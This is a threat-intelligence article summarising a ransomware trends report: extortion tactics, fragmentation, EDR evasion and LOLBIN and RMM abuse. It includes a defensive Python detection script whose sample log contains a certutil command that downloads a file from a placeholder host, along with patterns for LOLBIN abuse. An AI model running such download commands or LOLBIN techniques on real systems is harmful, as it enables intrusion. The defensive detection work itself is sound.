Independent Ransomware Actors

Bridewell, a UK-based cybersecurity services company, has released its latest CTI Annual Report, a comprehensive deep dive into ransomware trends.  It highlighted a significant shift in attack strategies, payment dynamics, and threat actor behaviors, revealing that data theft and extortion have overtaken traditional encryption-only ransomware as the most successful approach for attackers.  While encryption-based attacks tend to result in larger individual ransom payments, often due to the urgency of restoring critical services, data theft and extortion cases are more likely to result in a payment, with attackers leveraging the fear of regulatory penalties and reputational damage to pressure victims into compliance.[1]

At the same time, ransomware payments have continued to decline year-over-year overall. Bridewell attributes this to stricter regulations, greater law enforcement coordination, and increasing sanctions on cybercriminal entities. Organizations considering payment must now conduct rigorous due diligence to avoid inadvertently transacting with sanctioned groups or Ransomware-as-a-Service (RaaS) operations.

Other key findings include:

Vulnerability exploitation on the rise - Bridewell has observed that groups such as Clop and Termite have become highly proficient in exploiting internet-facing systems and edge devices, including Fortinet, Ivanti, and others.  Exploiting unpatched vulnerabilities remains a primary attack vector, enabling threat actors to compromise numerous victims at scale and achieve more substantial financial outcomes.

Fragmentation and lone wolves - The ransomware ecosystem is becoming increasingly fragmented.  Bridewell threat intelligence links this to both infighting within groups and persistent law enforcement takedowns, which have led to the splintering of major groups such as Conti and AlphV/BlackCat.  This has resulted in a broader and more diverse pool of active ransomware actors, making the threat landscape more volatile and challenging to defend against.

Compounding this issue is the rise of lone-wolf actors, that is, individual affiliates or cybercriminals operating independently.  These actors often rely on leaked RaaS source code or publicly available tools to mount ransomware operations without the need for an established group.  This trend is partly driven by a lack of trust in larger operations due to the risk of exit scams, where affiliates are denied their share of ransom proceeds.

Tactical shifts in tooling and techniques - Bridewell continues to observe ransomware actors targeting VMware ESXi environments, aiming to cripple core virtualized infrastructure quickly.  Groups like VanHelsing and DragonForce are actively pursuing this tactic in ongoing campaigns.

Meanwhile, adversaries are developing or acquiring capabilities to evade Endpoint Detection and Response (EDR) systems, often through the abuse of vulnerable drivers or native software features.  The use of Living-Off-the-Land Binaries (LOLBINs) and Remote Monitoring and Management (RMM) tools has become widespread, allowing attackers to avoid detection and maintain persistent access without deploying traditional malware.
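As an added illustration of the detection side of the behaviours just described (this is not code from the Bridewell report or from Red Sky Alliance), the Python script below scans a handful of constructed process-creation and driver-load events and flags three things: a LOLBIN launched with a download or script-execution argument, a known RMM agent that is not the one IT has approved, and a driver that appears on a vulnerable-driver blocklist.  The event format, host names, RMM product names, and the blocklist entry are all assumptions made for the example; only the LOLBIN names are real Windows binaries.

```python
import re
from dataclasses import dataclass

# Well-known Windows binaries catalogued by the LOLBAS project as abusable.
LOLBINS = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "bitsadmin.exe"}

# Command-line fragments that turn a LOLBIN launch into something worth a look.
LOLBIN_SUSPICIOUS_ARGS = [
    re.compile(r"-urlcache", re.I),    # certutil fetching remote content
    re.compile(r"https?://", re.I),    # any remote resource on the command line
    re.compile(r"javascript:", re.I),  # mshta / rundll32 inline script
    re.compile(r"scrobj\.dll", re.I),  # regsvr32 scriptlet loader
]

# Assumed policy: the single RMM agent IT deploys (placeholder name).
APPROVED_RMM = {"approved-rmm-agent.exe"}
# Other RMM agents the organisation recognises but has not sanctioned (placeholders).
KNOWN_RMM = APPROVED_RMM | {"remote-tool-a.exe", "remote-tool-b.exe"}

# Placeholder blocklist entry; a real deployment would consume a maintained
# vulnerable-driver blocklist rather than this constructed name.
VULNERABLE_DRIVERS = {"vuln_driver_example.sys"}


@dataclass
class Finding:
    rule: str
    host: str
    detail: str


def parse_event(line: str) -> dict:
    """Parse a constructed key="value" event line into a dict."""
    return {m.group(1): m.group(2) for m in re.finditer(r'(\w+)="([^"]*)"', line)}


def basename(path: str) -> str:
    """Lower-cased file name taken from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Apply the three rules to one parsed event and return any findings."""
    findings = []
    host = event.get("host", "?")
    image = basename(event.get("image", ""))
    if event.get("type") == "process":
        cmd = event.get("cmdline", "")
        if image in LOLBINS and any(p.search(cmd) for p in LOLBIN_SUSPICIOUS_ARGS):
            findings.append(Finding("lolbin_abuse", host, f"{image}: {cmd}"))
        if image in KNOWN_RMM and image not in APPROVED_RMM:
            findings.append(Finding("unapproved_rmm", host, image))
    elif event.get("type") == "driver_load":
        if image in VULNERABLE_DRIVERS:
            findings.append(Finding("vulnerable_driver", host, image))
    return findings


def scan(lines) -> list:
    """Run every rule over every non-empty event line, preserving log order."""
    findings = []
    for line in lines:
        if line.strip():
            findings.extend(evaluate(parse_event(line)))
    return findings


# Constructed sample events: one benign certutil use, one download-style use,
# an unapproved RMM agent, the approved agent, and a blocklisted driver load.
SAMPLE_LOG = r'''
type="process" host="ws01" image="C:\Windows\System32\certutil.exe" cmdline="certutil.exe -dump cert.cer"
type="process" host="ws01" image="C:\Windows\System32\certutil.exe" cmdline="certutil.exe -urlcache -split -f http://example.invalid/x.txt C:\Users\Public\x.txt"
type="process" host="ws02" image="C:\Program Files\RemoteToolA\remote-tool-a.exe" cmdline="remote-tool-a.exe --service"
type="process" host="ws03" image="C:\Program Files\ApprovedRMM\approved-rmm-agent.exe" cmdline="approved-rmm-agent.exe"
type="driver_load" host="srv01" image="C:\Windows\Temp\vuln_driver_example.sys"
'''

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

The point of the allow-list rule is that the RMM binary itself is legitimate software, so a hash or signature check will not help; what distinguishes abuse from administration is whether that particular product is the one the organisation deployed.  Likewise, the LOLBIN rule fires on the combination of binary and argument, not on the binary alone, because these tools run constantly on healthy systems.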

Despite efforts to disrupt its use, Cobalt Strike remains the most widely used offensive security tool by ransomware operators, closely followed by others such as Metasploit, Sliver, Brute Ratel, and, more recently, Pyramid C2, a Python-based command and control (C2) framework.

Shift to data theft-only operations - Bridewell has also observed the continued evolution of data-theft-only ransomware operations, which bypass encryption altogether.  This approach is particularly effective in today’s increasingly regulated privacy landscape, where organizations fear substantial fines and long-term damage to their brand.  Attackers are now refining their extortion tactics to exploit this pressure more effectively.

Remote access and patch management remain a weak link - Bridewell’s insights, aligned with Q1 2025 data from Coveware, show that remote access solutions (VPNs, RMMs) and unpatched software vulnerabilities continue to be the leading intrusion vectors.  Although phishing incidents appear to be decreasing, it is likely that phishing is now being used indirectly, by access brokers selling credentials to ransomware affiliates.

“We’re seeing a clear shift in ransomware tactics. Encryption-only attacks are proving less effective, while data theft and extortion are leading to more successful payment outcomes.  At the same time, organizations are increasingly hesitant to pay ransoms due to growing regulatory pressure and the risk of violating sanctions,” said Gavin Knapp, Cyber Threat Intelligence Principal Lead at Bridewell.  “Our goal with this report is to provide actionable insights that help organizations strengthen their defenses and build greater resilience against cyberattacks.  Staying ahead of persistent and evolving threat actors is no easy task, but understanding and mitigating the risks posed by adversarial infrastructure must remain a core component of any robust cybersecurity strategy.”

This article is shared with permission at no charge for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC).  For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com

Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122

[1] https://www.itsecurityguru.org/2025/06/25/bridewell-report-indicates-rise-in-lone-wolf-ransomware-actors/